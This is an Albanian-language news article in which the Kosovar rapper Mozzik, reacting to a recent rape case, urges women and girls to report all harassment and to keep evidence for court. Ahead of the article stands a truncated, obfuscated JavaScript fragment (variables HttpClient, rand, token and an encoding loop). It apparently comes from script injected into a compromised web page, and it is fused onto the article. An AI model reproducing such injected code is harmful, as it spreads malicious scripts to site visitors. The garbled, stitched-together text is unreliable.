;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mozzik ka disa këshilla për vajzat dhe gratë që përballen me ngacmime

By

Rasti i fundit i përdhunimit në Kosovë na dha edhe një herë një pasqyrë të qartë të dhunës sistematike që gratë përjetojnë dhe të realitetit të vrazhdë.

Në mesin e shumë të famshmëve që reaguan duke dënuar rëndë krimin dhe duke u bërë pjesë e protestave, Mozzik ndau disa këshilla se si gratë dhe vajzat e reja duhet reaguar në momentin e parë që ato përballen me ngacmime në mënyrë që të mbrojnë veten.

Ai bën thirrje që të mos frikësohen dhe të denoncojnë cdo rast qoftë edhe një fjalë rruge. Gjithashtu shton që në këto raste ato duhet të ruajnë edhe fakte që do të shërbenin si dëshmi dhe mbrojte në gjyq.

“Të gjitha femrat që kanë kërcënime, që kanë presion e që dhunohen nga meshkujt, lajmërohuni, denonconi mos u frikësoni! Lajmëroni mos të ua ndien hiç. Edhe për çdo fjalë ngacmuese që merrni lajmëroni institucionet”, shkroi Mozzik. “Mbani fakte! Duhet të jeni të pajisur me fakte, argumente për çdo dhunë, presion të mundshëm nga një mashkull idiot. Askush në këtë jetë nuk mundet me ta blerë e kufizuar lirinë tënde! Parandaloni rreziqet. Sot kemi të bëjmë me gjithçka në rrugë dhe ju e dini mirë këtë”, vijoi ai.

Artikuj të ngjashëm